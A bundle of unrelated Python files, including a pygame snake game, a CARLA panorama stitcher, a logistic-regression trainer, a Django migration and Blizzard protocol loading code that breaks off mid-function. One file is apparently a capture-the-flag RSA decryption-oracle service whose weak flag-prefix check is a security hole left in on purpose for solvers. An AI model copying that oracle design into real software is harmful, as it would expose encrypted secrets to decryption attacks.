        # Respawn the fruit if it landed on the snake's body...
        for block in self.snake.body[1:]:
            if block == self.fruit.pos:
                self.fruit.respawn_fruit()
        # ...or on an obstacle cell.
        for obstacle in self.obstacle.blocks:
            if obstacle == self.fruit.pos:
                self.fruit.respawn_fruit()

    def check_fail(self):
        """Reset the game when the snake leaves the board or hits itself/an obstacle."""
        # Head out of bounds.
        if not 0 <= self.snake.body[0].x < cell_count or \
                not 0 <= self.snake.body[0].y < cell_count:
            self.game_over()
            self.over.play()
            self.over.set_volume(0.08)
        # Head colliding with its own body.
        for block in self.snake.body[1:]:
            if block == self.snake.body[0]:
                self.game_over()
        # Head colliding with an obstacle block.
        for block in self.obstacle.blocks:
            if self.snake.body[0] == block:
                self.game_over()
                self.over.play()
                self.over.set_volume(0.08)

    # noinspection PyMethodMayBeStatic
    # this because the method does not use self in its body and hence does
    # not actually change the class instance. Hence the method could be static,
    # i.e. callable without passing a class instance
    def game_over(self):
        """End the round by resetting the snake to its starting state."""
        self.snake.reset()

    # noinspection PyMethodMayBeStatic
    def draw_grass(self):
        """Paint a checkerboard of lighter-green cells over the background."""
        grass_color = (167, 209, 61)
        for row in range(cell_count):
            if row % 2 == 0:
                for column in range(cell_count):
                    if column % 2 == 0:
                        grass_rect = pygame.Rect(column * cell_size, row * cell_size, cell_size, cell_size)
                        pygame.draw.rect(game_screen, grass_color, grass_rect)
            else:
                for column in range(cell_count):
                    if column % 2 != 0:
                        grass_rect = pygame.Rect(column * cell_size, row * cell_size, cell_size, cell_size)
                        pygame.draw.rect(game_screen, grass_color, grass_rect)

    def draw_score(self):
        """Render the score (segments eaten) with an apple icon, bottom-right."""
        # Score = current length minus the starting 3 segments.
        score_text = str(len(self.snake.body) - 3)
        score_surface = game_font.render(score_text, True, (54, 74, 12))
        score_posx = int(cell_size * cell_count - 60)
        score_posy = int(cell_size * cell_count - 40)
        score_rect = score_surface.get_rect(center=(score_posx, score_posy))
        fruit_rect = apple.get_rect(midright=(score_rect.left, score_rect.centery))
        # Background panel sized to fit the icon plus the number.
        bg_rect = pygame.Rect(fruit_rect.left, fruit_rect.top,
                              fruit_rect.width + score_rect.width + 6, fruit_rect.height)
        pygame.draw.rect(game_screen, (167, 209, 61), bg_rect)
        game_screen.blit(score_surface, score_rect)
        game_screen.blit(apple, fruit_rect)
        pygame.draw.rect(game_screen, (0, 0, 0), bg_rect, 2)
main_game = Main()
# Creating own screen update event
SCREEN_UPDATE = pygame.USEREVENT
# Fire SCREEN_UPDATE every 150 ms: this sets the snake's speed,
# independent of the 60 FPS render rate below.
pygame.time.set_timer(SCREEN_UPDATE, 150)
while True:
    # Start of every iteration we check for any event
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            pygame.quit()
            sys.exit()
        if event.type == SCREEN_UPDATE:
            main_game.update()
        # On KEY DOWN event we change snake.direction
        if event.type == pygame.KEYDOWN:
            # Each arrow key turns the snake unless that would reverse it
            # directly back onto its own body.
            if event.key == pygame.K_UP:
                if main_game.snake.direction.y != 1:
                    main_game.snake.direction = Vector2(0, -1)
            if event.key == pygame.K_DOWN:
                if main_game.snake.direction.y != -1:
                    main_game.snake.direction = Vector2(0, 1)
            if event.key == pygame.K_LEFT:
                if main_game.snake.direction.x != 1:
                    main_game.snake.direction = Vector2(-1, 0)
            if event.key == pygame.K_RIGHT:
                if main_game.snake.direction.x != -1:
                    main_game.snake.direction = Vector2(1, 0)
    game_screen.fill((175, 215, 70))
    main_game.draw_elements()
    # Refreshing game surface
    pygame.display.update()
    # Restricting while loop to run 60 times per second
    clock.tick(60)
|
#!/usr/bin/env python
from abc import ABC, abstractmethod
import argparse
import gc
import os
import warnings
from pathlib import Path
from typing import Union, Generator, Tuple
import ffmpeg
import h5py
import imageio
import numpy as np
import utils
from carla_constants import *
from utils import save_data, stitch_image_tensors
import matplotlib.pyplot as plt
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
with warnings.catch_warnings():
warnings.simplefilter("ignore")
import tensorflow as tf
tf.get_logger().setLevel('ERROR')
from tqdm import tqdm
from recordings import Recording, SplitFrame
from sides import Side
def de_batch_gen(gen: Generator[np.ndarray, None, None]) -> Generator[np.ndarray, None, None]:
    """Flatten a stream of frames and frame batches into single frames.

    4-D arrays (batch, H, W, C) are yielded one 3-D frame at a time; 3-D
    arrays are yielded unchanged.

    Raises:
        ValueError: if an array of any other rank is encountered.
    """
    for a in gen:
        if np.ndim(a) == 4:
            yield from a
        elif np.ndim(a) == 3:
            yield a
        else:
            # BUGFIX: the bare ValueError carried no context about the input.
            raise ValueError(f"expected a 3-D frame or a 4-D batch, got ndim={np.ndim(a)}")
def batch_gen(batch_size: int, gen: Generator[np.ndarray, None, None]) -> Generator[np.ndarray, None, None]:
    """Re-batch a stream of frames/batches into stacks of *batch_size* frames.

    The input is first flattened to single frames via de_batch_gen; the
    final yielded stack may hold fewer than *batch_size* frames.
    """
    pending = []
    for frame in de_batch_gen(gen):
        pending.append(frame)
        if len(pending) == batch_size:
            yield np.stack(pending)
            pending = []
    # Flush the (possibly short) remainder.
    if pending:
        yield np.stack(pending)
class StitchSource(ABC):
    """Abstract provider of image frames to be drained into an HDF5 dataset.

    Concrete subclasses decide where frames come from (stitched panoramas or
    a single camera side) and describe the output dataset/video metadata.
    """

    def __init__(self, recording: Recording, rgb: bool):
        # rgb=True -> 3-channel color frames; rgb=False -> 1-channel depth.
        self.rgb = rgb
        self.recording = recording
        self.num_frames = len(self.recording.raw.frames)

    @property
    @abstractmethod
    def should_video(self) -> bool:
        """Whether a preview video should be rendered for this source."""
        pass

    @property
    @abstractmethod
    def video_name(self) -> str:
        """File name of the preview video."""
        pass

    @property
    @abstractmethod
    def dtype(self) -> str:
        """NumPy dtype name of the output dataset (e.g. 'uint8', 'uint16')."""
        pass

    @property
    @abstractmethod
    def shape(self) -> Tuple[int, int, int, int]:
        """Full dataset shape: (num_frames, height, width, channels)."""
        pass

    @property
    @abstractmethod
    def get_frames(self) -> Generator[np.ndarray, None, None]:
        """Generator of frames (3-D arrays) and/or frame batches (4-D arrays)."""
        pass

    @property
    def dataset_name(self) -> str:
        # The HDF5 dataset name is keyed off the channel type.
        return "rgb" if self.rgb else "depth"

    @property
    @abstractmethod
    def pbar_desc(self) -> str:
        """Progress-bar description shown while draining this source."""
        pass
class PanoramaStitchSource(StitchSource):
    """Source of panoramic frames stitched from the per-side cameras via a LUT."""

    def __init__(self, recording: Recording, lut, batch_size: int, spherical: bool, rgb: bool):
        super().__init__(recording, rgb)
        self.spherical = spherical
        self.batch_size = batch_size
        # Accept either a Path or anything Path() accepts (e.g. a string).
        lut_path = lut if isinstance(lut, Path) else Path(lut)
        self.lut = np.load(lut_path.absolute().resolve())

    @property
    def should_video(self) -> bool:
        # Only RGB panoramas get a preview video.
        return self.rgb

    @property
    def video_name(self) -> str:
        return "spherical.mkv" if self.spherical else "cylindrical.mkv"

    @property
    def get_frames(self) -> Generator[np.ndarray, None, None]:
        # Re-batch the stitched output into chunks of 100 frames.
        return batch_gen(100, _stich(self))

    @property
    def dtype(self) -> str:
        return 'uint8' if self.rgb else 'uint16'

    @property
    def shape(self) -> Tuple[int, int, int, int]:
        # Output resolution is dictated by the lookup table.
        height = self.lut.shape[0]
        width = self.lut.shape[1]
        channels = 3 if self.rgb else 1
        return self.num_frames, height, width, channels

    @property
    def pbar_desc(self) -> str:
        geometry = 'spherical' if self.spherical else 'cylindrical'
        channel = 'RGB' if self.rgb else 'Depth'
        return f"Stitching {geometry} {channel} frames"
class SideStitchSource(StitchSource):
    """Frame source for a single camera side (no stitching)."""

    def __init__(self, recording: Recording, side: Side, rgb: bool):
        super().__init__(recording, rgb)
        self.side = side

    @property
    def should_video(self) -> bool:
        # Only the front RGB stream gets a preview video.
        return self.side is Side.Front and self.rgb

    @property
    def video_name(self) -> str:
        return "front.mkv"

    @property
    def get_frames(self) -> Generator[np.ndarray, None, None]:
        # Emit everything as one 4-D batch.
        yield np.stack(list(self._frames()))

    def _frames(self):
        # BUGFIX: this previously read the module-level globals `r` and
        # `side` (only defined in the __main__ script) instead of this
        # instance's own recording/side, breaking any other caller.
        data = self.recording.raw[self.side]
        for frame in data.frames:
            if self.rgb:
                yield frame.rgb_data
            else:
                # Depth frames are (H, W); add a trailing channel axis.
                yield frame.depth_data[:, :, np.newaxis]

    @property
    def dtype(self) -> str:
        if self.rgb:
            return 'uint8'
        else:
            return 'uint16'

    @property
    def shape(self) -> Tuple[int, int, int, int]:
        return self.num_frames, IMAGE_WIDTH, IMAGE_HEIGHT, 3 if self.rgb else 1

    @property
    def pbar_desc(self) -> str:
        return f"Collecting {self.side.name.lower()} frames"
def _batch_frames(frames, batch_size, im_shape, im_dtype, spherical: bool,
                  rgb: bool):
    """Yield fixed-size batches of horizontally concatenated multi-camera frames.

    Each output frame is the per-side images concatenated along the width
    axis in the order Back, Left, Front, Right (+ Top, Bottom when
    *spherical*); depth frames additionally get a trailing channel axis so
    their shape matches *im_shape*. The final batch may hold fewer than
    *batch_size* frames.
    """
    # Concatenation order matters: it must match the stitching LUT layout.
    sides = [Side.Back, Side.Left, Side.Front, Side.Right]
    if spherical:
        sides += [Side.Top, Side.Bottom]
    # The rgb/depth branches previously duplicated the whole loop body;
    # selecting the attribute once keeps them in sync.
    attribute = 'rgb_data' if rgb else 'depth_data'
    batch_i = 0
    batch = np.empty(shape=(batch_size,) + im_shape, dtype=im_dtype)
    for frame in frames:
        im = np.concatenate([getattr(frame[s], attribute) for s in sides], axis=1)
        if not rgb:
            # Depth images are (H, W); add the channel axis.
            im = np.expand_dims(im, -1)
        batch[batch_i] = im
        if batch_i == batch_size - 1:
            yield batch
            # Allocate a fresh buffer so consumers may keep the yielded one.
            batch = np.empty(shape=(batch_size,) + im_shape, dtype=im_dtype)
            batch_i = 0
        else:
            batch_i += 1
    # Flush the (possibly short) remainder.
    if batch_i > 0:
        yield batch[:batch_i]
def _stich(source: PanoramaStitchSource):
    """Yield batches of panorama frames stitched from the raw per-side images.

    Concatenates each raw frame's side images into one wide strip, then maps
    the strip through the source's lookup table with stitch_image_tensors.
    Depth panoramas additionally get a per-pixel distance correction and a
    validity mask.
    """
    im_type = source.dtype
    if source.rgb:
        im_shape = (IMAGE_WIDTH, IMAGE_HEIGHT, 3)
    else:
        im_shape = (IMAGE_WIDTH, IMAGE_HEIGHT, 1)
    # Width of the concatenated strip: 6 sides for spherical, 4 for cylindrical.
    if source.spherical:
        concat_shape = (im_shape[0], im_shape[1] * 6, im_shape[2])
    else:
        concat_shape = (im_shape[0], im_shape[1] * 4, im_shape[2])
    frames = source.recording.raw.frames
    if not source.spherical:
        # Cylindrical case: build a per-column 1/cos(theta) depth correction,
        # where theta sweeps each camera's field of view; the strip starts and
        # ends with half-camera slices so the seams line up.
        size = source.lut.shape[1] // 4
        t = np.pi / 4
        thetas = np.linspace(-t, t, size)
        all_thetas = np.concatenate((thetas[size // 2:],
                                     thetas,
                                     thetas,
                                     thetas,
                                     thetas[:size // 2]))
        depth_multiplier = 1 / np.cos(all_thetas)
        depth_multiplier = depth_multiplier[np.newaxis, np.newaxis, :]
        depth_multiplier = depth_multiplier.astype('float32')
        # depth_multiplier = np.float32(1)
    else:
        # Spherical case: the LUT's third channel carries the multiplier.
        depth_multiplier = source.lut[:, :, 2].astype('float32')
    for batch in _batch_frames(frames, source.batch_size, concat_shape, im_type,
                               source.spherical, source.rgb):
        if not source.rgb:
            # Mask out invalid depth samples (sentinel value 10000).
            mask = np.logical_not(batch == 10000).astype(
                'float32')  # 10000 or 9999? # np.isclose(batch, 10000, atol=0, rtol=0)
        else:
            mask = None
        batch_frames = np.array(
            stitch_image_tensors(source.lut[:, :, 0:2],
                                 batch,
                                 depth_multiplier,
                                 mask,  # TODO try without
                                 source.rgb)).astype(im_type)
        # if mask is not None:
        #     batch_frames[batch_frames == 0] = -1
        if not source.rgb:
            # Restore the channel axis dropped by the stitcher.
            batch_frames = batch_frames[:, :, :, np.newaxis]
        yield batch_frames
IMAGE_SAVE_POINT = 200
def _process(source: StitchSource, create_in):
    """Drain one stitch source: write every frame into a new HDF5 dataset
    and, when the source asks for it, an H.264 preview video plus one
    PNG still at IMAGE_SAVE_POINT.

    NOTE(review): the video path depends on the module-level `r` (the
    Recording currently iterated by the __main__ loop) — confirm before
    calling this outside that loop.
    """
    shape = source.shape
    dtype = source.dtype
    # Gzip level 4 was chosen from the compression benchmark noted at the
    # bottom of this file.
    dataset = create_in.create_dataset(source.dataset_name, shape=shape, dtype=dtype,
                                       compression='gzip', compression_opts=4,
                                       # compression='lzf',
                                       shuffle=True,
                                       fletcher32=True)
    if source.should_video:
        video_file = r.base_data_dir / source.video_name
        # Start clean: remove any previous video and preview still.
        if video_file.exists():
            video_file.unlink()
        if video_file.with_suffix(".png").exists():
            video_file.with_suffix(".png").unlink()
        n, height, width, channels = shape
        # Raw RGB frames are streamed to ffmpeg over stdin.
        process = (
            ffmpeg
            .input('pipe:', format='rawvideo',
                   pix_fmt='rgb24',
                   s='{}x{}'.format(width, height))
            .output(str(video_file), pix_fmt='yuv420p',
                    vcodec='libx264')
            .overwrite_output()
            .global_args('-loglevel', 'quiet', "-preset", "ultrafast", "-crf", "12")
        )
        process = process.run_async(pipe_stdin=True)
    pbar = tqdm(
        desc=source.pbar_desc,
        unit='frame',
        total=shape[0],
        mininterval=0)
    i = 0
    for frame in source.get_frames:
        if np.ndim(frame) == 4:
            # multiple frames at once (batched generator output)
            dataset[i:i + len(frame), :, :, :] = frame
            # if not source.rgb:
            #     depth = frame[0][:, :, 0]
            #     depth[depth >= 10000] = 10000
            #     plt.imshow(depth, cmap='gray', vmin=0, vmax=np.max(depth))
            #     plt.show()
            #     print()
            if source.should_video:
                for f in frame:
                    process.stdin.write(f.tobytes())
                # Save the preview still when this batch crosses the
                # IMAGE_SAVE_POINT frame index.
                if i <= IMAGE_SAVE_POINT < i + len(frame):
                    imageio.imwrite(str(video_file.with_suffix(".png")), frame[IMAGE_SAVE_POINT - i])
            i += len(frame)
            pbar.update(len(frame))
        elif np.ndim(frame) == 3:
            # single frame
            dataset[i, :, :, :] = frame
            if source.should_video:
                process.stdin.write(frame.tobytes())
                if i == IMAGE_SAVE_POINT:
                    imageio.imwrite(str(video_file.with_suffix(".png")), frame)
            i += 1
            pbar.update(1)
        else:
            raise ValueError(frame)
    if source.should_video:
        # Close stdin so ffmpeg can finalize the container, then wait.
        process.stdin.close()
        process.wait()
    gc.collect()
"""
Stats:
Gzip level 5: 2092s, 8.17 GB
No compression: 1345.46s, 36 GB
Gzip level 2: 1524.21s, 8.9 GB
Gzip level 3: 1724.21s, 8.4 GB
Gzip level 4: 1796.92s, 8.4 GB ** best so far
Gzip level 9: 9658.69s, 7.67 GB
LZF: 1261.98s, 13.5 GB
"""
if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description="Stitch raw images into cylindrical and spherical "
                    "panoramas.")
    parser.add_argument("cylindrical_lut",
                        help="Cylindrical lookup table file.")
    parser.add_argument("spherical_lut",
                        help="Spherical lookup table file.")
    parser.add_argument("--single", "-s",
                        action='append',
                        help="Stitch files in this single directory. Can be "
                             "specified multiple times.")
    parser.add_argument("--all", "-a",
                        help="Stitch all files for all recordings in this "
                             "base directory.")
    parser.add_argument("--batch_size", "-b",
                        type=int,
                        default=30,
                        help="Batch size used for stitching")
    parser.add_argument("--no_cylindrical",
                        action='store_true',
                        help="Skip cylindrical stitching (and lut if "
                             "specified).")
    parser.add_argument("--no_spherical",
                        action='store_true',
                        help="Skip spherical stitching (and lut if specified).")
    parser.add_argument("--overwrite", "-o",
                        action='store_true',
                        # Fixed: help text was a copy-paste of --no_spherical's.
                        help="Overwrite existing stitched output files.")
    parser.add_argument("--do_uploaded", "-u",
                        action='store_true',
                        help="Re-stitch even if it has been uploaded (./uploaded exists)")
    args = parser.parse_args()

    # Collect the recordings to process from either --single or --all.
    if args.single is not None:
        recordings = [Recording.from_dir(d) for d in args.single]
    elif args.all is not None:
        recordings = Recording.all_in_dir(args.all)
    else:
        print(
            "No recording directories specified. Use --all/-a or --single/-s")
        quit()

    with warnings.catch_warnings():
        warnings.simplefilter("ignore")
        # TODO detect existing
        pbar = tqdm(recordings, desc="Recordings", unit='recording')
        for r in pbar:
            r: Recording
            pbar.set_postfix_str("Recording: " + str(r.base_data_dir))
            cylindrical_file = r.base_data_dir / "cylindrical.hdf5"
            spherical_file = r.base_data_dir / "spherical.hdf5"
            pinhole_file = r.base_data_dir / "pinhole.hdf5"
            if r.is_uploaded and not args.do_uploaded:
                print(f"Stitched data for {r.base_data_dir} has already been uploaded, skipping")
                continue
            # Decide what to do about pre-existing output files.
            if cylindrical_file.exists() or spherical_file.exists() or pinhole_file.exists():
                if args.overwrite:
                    if cylindrical_file.exists():
                        cylindrical_file.unlink()
                    if spherical_file.exists():
                        spherical_file.unlink()
                    if pinhole_file.exists():
                        pinhole_file.unlink()
                elif args.all is not None:
                    # In batch mode, a fully stitched recording is skipped;
                    # a partially stitched one is an error.
                    if cylindrical_file.exists() and spherical_file.exists() and pinhole_file.exists():
                        print(f"Data already exists, skipping: {r.base_data_dir}")
                        continue
                    else:
                        raise FileExistsError(f"Some data exists for {r.base_data_dir}, but not all of it")
                else:
                    raise FileExistsError("Data already exists")
            try:
                if not args.no_cylindrical:
                    with h5py.File(str(cylindrical_file), "w") as file:
                        _process(PanoramaStitchSource(r, args.cylindrical_lut, args.batch_size, False, True), file)
                        _process(PanoramaStitchSource(r, args.cylindrical_lut, args.batch_size, False, False), file)
                if not args.no_spherical:
                    with h5py.File(str(spherical_file), "w") as file:
                        _process(PanoramaStitchSource(r, args.spherical_lut, args.batch_size, True, True), file)
                        _process(PanoramaStitchSource(r, args.spherical_lut, args.batch_size, True, False), file)
                # save pinhole frames in matching formats
                with h5py.File(str(pinhole_file), "w") as file:
                    for side in tqdm(list(Side), desc="Saving sides", unit="side", total=len(list(Side))):
                        side_group = file.create_group(side.name.lower())
                        _process(SideStitchSource(r, side, True), side_group)
                        _process(SideStitchSource(r, side, False), side_group)
            except Exception as e:
                # Remove partial output so a re-run starts fresh.
                if cylindrical_file.exists():
                    cylindrical_file.unlink()
                if spherical_file.exists():
                    spherical_file.unlink()
                if pinhole_file.exists():
                    pinhole_file.unlink()
                # Fixed: `e` was captured but never reported; show the cause
                # before moving on to the next recording.
                print(f"Errored on {r.base_data_dir}: {e}")
                # raise e
|
class Car:
    """A basic car model with a make, a speed, and an odometer."""

    def __init__(self, marka, speed):
        """Store the make and speed; the odometer starts at zero."""
        self.marka = marka
        self.speed = speed
        self.odometr_reading = 0

    def car_ride(self):
        """Return a one-line (Russian) status message for the ride."""
        return f"машинка {self.marka} едет со скоростью {self.speed}"

    def read_odometr(self):
        """Print the car's current mileage (Russian text)."""
        # NOTE: the original message lacks a space before "на счетчике";
        # preserved byte-for-byte.
        print(f"У этого автомобиля пробег {self.odometr_reading}на счетчике")

    def update_odometr(self, mileage):
        """Set the odometer reading to the given mileage."""
        self.odometr_reading = mileage
|
from math import exp
from math import log
import numpy as np
import linsepexamples
def sigmoid(arg):
    """Numerically stable logistic function 1 / (1 + e^(-arg)).

    The naive form raises OverflowError in math.exp for large negative
    arg; branching on the sign keeps the exponent non-positive so exp()
    underflows to 0.0 instead of overflowing.
    """
    if arg >= 0:
        return 1 / (1 + exp(-arg))
    e = exp(arg)
    return e / (1 + e)
def log_create(name_datafile):
    """Create the log file, truncating it if it already exists."""
    with open(name_datafile, 'w'):
        pass
def log_set(name_datafile, name_set, examples_set):
    """Append a named set of examples to the log file.

    Writes a "<name_set> :" header followed by one example per line.
    """
    # Fixed: the original bound the file handle to the function's own
    # name ("as log_set"), shadowing it inside the body.
    with open(name_datafile, 'a') as log_file:
        log_file.write("\n\n" + name_set + " : \n\n")
        for example in examples_set:
            log_file.write(str(example) + "\n")
# Cross-entropy is the loss function:
# L(D) = - 1/n * ( y1 * ln(f(x1)) + (1 - y1) * (ln(1 - f(x1))) + ...
# ... + yn * ln(f(xn)) + (1 - yn) * (ln(1 - f(xn)))),
# where n is the batch size; yi is the label of example i; xi is example i; f = sigmoid(linear combination)
# Note: index_end_example is not included (half-open range).
def cross_entropy(trained_weights, examples_set, index_begin_example, index_end_example):
    """Mean cross-entropy loss over examples [index_begin_example, index_end_example).

    Each element of examples_set is a (features, label) pair with a 0/1
    label. Returns the loss averaged over the slice.
    """
    # Tiny additive constant keeps log() away from log(0) when the
    # sigmoid saturates; hoisted out of the loop (it is invariant).
    mini_const = 7e-300
    cr_entropy = np.float128(0)
    for index_example in range(index_begin_example, index_end_example):
        features = examples_set[index_example][0]
        mark_of_class = examples_set[index_example][1]
        # Fixed: the sigmoid was evaluated three times per example (once
        # into an unused `for_show` variable); compute it once.
        predicted = sigmoid(np.dot(trained_weights, features))
        cr_entropy -= (mark_of_class * log(predicted + mini_const) +
                       (1 - mark_of_class) * log(1 - predicted + mini_const))
    return cr_entropy / (index_end_example - index_begin_example)
def gradient_cross_entropy(trained_weights, examples_set, index_example):
    """Gradient of the cross-entropy loss for a single example.

    For label y and prediction s = sigmoid(w . x) each component is
    (y * (1 - s) - (1 - y) * s) * x_k; computed as one broadcasted
    NumPy expression instead of the original per-component append loop.
    """
    features = np.asarray(examples_set[index_example][0])
    mark_of_class = examples_set[index_example][1]
    sigmoid_value = sigmoid(np.dot(trained_weights, features))
    # Scalar error term, broadcast over the feature vector.
    error = mark_of_class * (1 - sigmoid_value) - (1 - mark_of_class) * sigmoid_value
    return error * features
def update_trained_weights(trained_weights, gradient_loss, learning_rate):
    """Take one in-place gradient step on the weight vector."""
    trained_weights += gradient_loss * learning_rate
def stochastic_gradient_descent(trained_weights, training_set, learning_rate):
    """One pass over the training set, updating weights after every example."""
    for example_index, _ in enumerate(training_set):
        step = gradient_cross_entropy(trained_weights, training_set, example_index)
        update_trained_weights(trained_weights, step, learning_rate)
def do_train():
    """Train a single logistic neuron on generated linearly separable data.

    Logs both datasets to neuron_data.txt and per-epoch loss/weights to
    neuron_loss.txt, decaying the learning rate by 5% each epoch.
    """
    # NOTE(review): the weight vector gets len(dimensions) == 2 components,
    # so each generated example presumably has 2 features scaled by
    # `dimensions` — confirm against linsepexamples.
    dimensions = [400, 40]
    name_datafile = 'neuron_data.txt'
    name_lossesfile = 'neuron_loss.txt'
    count_training_examples = 1000
    count_tests_examples = 1000
    count_ages = 1000  # "ages" == training epochs
    learning_rate = np.float128(0.0005)
    trained_weights = np.array([np.float128(0.5)] * len(dimensions))
    log_create(name_datafile)
    log_create(name_lossesfile)
    training_set = linsepexamples.generate_linear_separable_examples( \
        count_training_examples, dimensions)
    log_set(name_datafile, "Training set", training_set)
    test_set = linsepexamples.generate_linear_separable_examples( \
        count_tests_examples, dimensions)
    log_set(name_datafile, "Test set", test_set)
    with open(name_lossesfile, "w") as log_losses:
        for number_age in range(count_ages):
            stochastic_gradient_descent(trained_weights, training_set, learning_rate)
            # Loss is evaluated on the held-out test set each epoch.
            loss = cross_entropy(trained_weights, test_set, 0, len(test_set))
            learning_rate *= 0.95
            log_losses.write(" Age " + str(number_age) + ", Loss " + str(loss) + \
                " Weights " + str(trained_weights) + "\n")


# Runs at import time; the script has no __main__ guard.
do_train()
|
#!/usr/local/bin/python
# CTF-style RSA "decryption oracle" challenge service.
from Crypto.Util.number import getStrongPrime, bytes_to_long, long_to_bytes

# Flag plaintext read from disk and encoded as a big integer.
f = open("flag.txt").read()
m = bytes_to_long(f.encode())

# 1024-bit RSA modulus from two 512-bit strong primes.
p = getStrongPrime(512)
q = getStrongPrime(512)
n = p*q
e = 65537

# Publish the public key and the encrypted flag.
c = pow(m,e,n)
print("n =",n)
print("e =",e)
print("c =",c)

# Private exponent via Python 3.8+ modular inverse (pow with exponent -1).
d = pow(e, -1, (p-1)*(q-1))

# Decrypt an arbitrary user-supplied ciphertext, refusing anything that
# would reveal the flag: the decryption must not contain the flag prefix.
# NOTE(review): `c == m` compares the submitted integer against the flag
# *plaintext*, not the published ciphertext — presumably deliberate for
# this challenge; confirm against the intended solution.
c = int(input("Text to decrypt: "))
if c == m or b"actf{" in long_to_bytes(pow(c, d, n)):
    print("No flag for you!")
    exit(1)
print("m =", pow(c, d, n))
"""This module contains functions related to Mantra Python filtering."""
# =============================================================================
# IMPORTS
# =============================================================================
# Standard Library Imports
import logging
import os
_logger = logging.getLogger(__name__)
# =============================================================================
# FUNCTIONS
# =============================================================================
def build_pyfilter_command(pyfilter_args=None, pyfilter_path=None):
    """Build a PyFilter -P command.

    :param pyfilter_args: Optional list of args to pass to the command.
    :type pyfilter_args: list(str)
    :param pyfilter_path: Optional path to the filter script.
    :type pyfilter_path: str
    :return: The constructed PyFilter command, or an empty string when the
        default filter script cannot be located.
    :rtype: str
    :raises OSError: If an explicitly supplied pyfilter_path does not exist.

    """
    if pyfilter_args is None:
        pyfilter_args = []

    # If no path was passed, use the one located in the HOUDINI_PATH.
    if pyfilter_path is None:
        # Fixed: import hou lazily so callers that supply an explicit path
        # do not need a running Houdini session.
        import hou

        try:
            pyfilter_path = hou.findFile("pyfilter/ht-pyfilter.py")

        # If we can't find the script then log an error and return nothing.
        except hou.OperationFailed:
            _logger.error("Could not find pyfilter/ht-pyfilter.py")

            return ""

    else:
        # Ensure the script path exists.
        if not os.path.isfile(pyfilter_path):
            raise OSError("No such file: {}".format(pyfilter_path))

    cmd = '-P "{} {}"'.format(pyfilter_path, " ".join(pyfilter_args))

    return cmd
|
'''
Created on Mar 31, 2014
@author: tony
'''
import os
class Deleter():
    """Deletes files from disk."""

    def fileDeleter(self, fileName):
        """Remove fileName and print a confirmation.

        Raises OSError if the file does not exist.
        """
        os.remove(fileName)
        # Fixed: parenthesized call form works under both Python 2 and 3;
        # the original used the Python-2-only print statement.
        print(fileName + " has been removed!")
|
import asyncio
from alarme import Action
from alarme.extras.common import SingleRFDevice
class RfTransmitterAction(Action):
    """Alarm action that transmits an RF code through a GPIO-attached
    transmitter.

    run() repeatedly sends `code + code_extra` until `run_count`
    transmissions have been made, or indefinitely when run_count is None,
    stopping early when self.running goes false.
    NOTE(review): `self.running` is presumably maintained by the Action
    base class — confirm.
    """

    def __init__(self, app, id_, gpio, code, code_extra=0, run_count=1, run_interval=0.02):
        super().__init__(app, id_)
        self.gpio = gpio                  # GPIO pin driving the transmitter
        self.code = code                  # base RF code to transmit
        self.code_extra = code_extra      # offset added to the base code
        self.run_count = run_count        # transmissions per run; None = until stopped
        self.run_interval = run_interval  # seconds between transmissions
        # SingleRFDevice presumably shares one RF device per GPIO — confirm.
        self.rf_device = SingleRFDevice(self.gpio)

    def _continue(self, run_count):
        # Keep going while the action is active and the requested count
        # (if any) has not been reached.
        return self.running and (self.run_count is None or run_count < self.run_count)

    async def run(self):
        self.rf_device.enable_tx()
        try:
            run_count = 0
            while self._continue(run_count):
                self.rf_device.tx_code(self.code + self.code_extra)
                run_count += 1
                # Sleep only if another transmission will follow.
                if self._continue(run_count):
                    await asyncio.sleep(self.run_interval)
        finally:
            # Always disable the transmitter, even if tx_code raises.
            self.rf_device.disable_tx()
|
# Generated by Django 3.0.5 on 2020-04-25 23:26
from django.db import migrations


class Migration(migrations.Migration):
    """Renames the Aluno field 'schooL' (capitalization typo) to 'school'."""

    dependencies = [
        ('alunos', '0001_initial'),
    ]

    operations = [
        migrations.RenameField(
            model_name='aluno',
            old_name='schooL',
            new_name='school',
        ),
    ]
|
import MySQLdb
class SQL:
    """Minimal helper around a MySQLdb connection."""

    def __init__(self):
        # Connection is created lazily by connectToSQLServer().
        self.db = None

    description = "This is a class"
    author = "Raaj"

    def connectToSQLServer(self):
        """Open the MySQL connection (credentials left blank here)."""
        self.db = MySQLdb.connect(host="",
                                  user="",
                                  passwd="",
                                  db="")

    def runQuery(self, query):
        """Execute query, echoing it and each row, and return all rows.

        Requires connectToSQLServer() to have been called first.
        """
        # Fixed: parenthesized print works under both Python 2 and 3.
        print(query)
        arr = []
        cur = self.db.cursor()
        try:
            cur.execute(query)
            for row in cur.fetchall():
                arr.append(row)
                print(row)
        finally:
            # Fixed: the original leaked the cursor on every call.
            cur.close()
        return arr
#!/usr/bin/env python
#
# Copyright 2015-2020 Blizzard Entertainment. Subject to the MIT license.
# See the included LICENSE file for more information.
#
import os
import re
import imp
import sys
def _import_protocol(base_path, protocol_module_name):
    """
    Import a module from a base path, used to import protocol modules.

    This implementation is derived from the __import__ example here:
    https://docs.python.org/2/library/imp.html

    NOTE(review): the `imp` module is deprecated and removed in Python
    3.12; migrating to importlib would be required there.
    """
    # Try to return the module if it's been loaded already
    if protocol_module_name in sys.modules:
        return sys.modules[protocol_module_name]

    # If any of the following calls raises an exception,
    # there's a problem we can't handle -- let the caller handle it.
    #
    fp, pathname, description = imp.find_module(protocol_module_name, [base_path])

    try:
        return imp.load_module(protocol_module_name, fp, pathname, description)
    finally:
        # Since we may exit via an exception, close fp explicitly.
        if fp:
            fp.close()
def list_all(base_path=None):
    """
    Returns a list of current protocol version file names in the versions
    module, sorted by protocol version number (ascending).
    """
    if base_path is None:
        base_path = os.path.dirname(__file__)

    pattern = re.compile(r'protocol[0-9]+\.py$')
    files = [f for f in os.listdir(base_path) if pattern.match(f)]
    # Fixed: sort numerically by the embedded version. A plain
    # lexicographic sort misorders any file whose version is not
    # zero-padded to a fixed width (e.g. protocol2.py after
    # protocol10.py), and latest() relies on the last entry being the
    # highest version.
    files.sort(key=lambda name: int(re.search(r'[0-9]+', name).group()))
    return files
def latest():
    """
    Import the latest protocol version in the versions module (directory)
    """
    base_path = os.path.dirname(__file__)
    # The highest version sorts last in the directory listing.
    newest_file = list_all(base_path)[-1]
    # "protocolNNNNN.py" -> "protocolNNNNN"
    module_name = newest_file.split('.')[0]
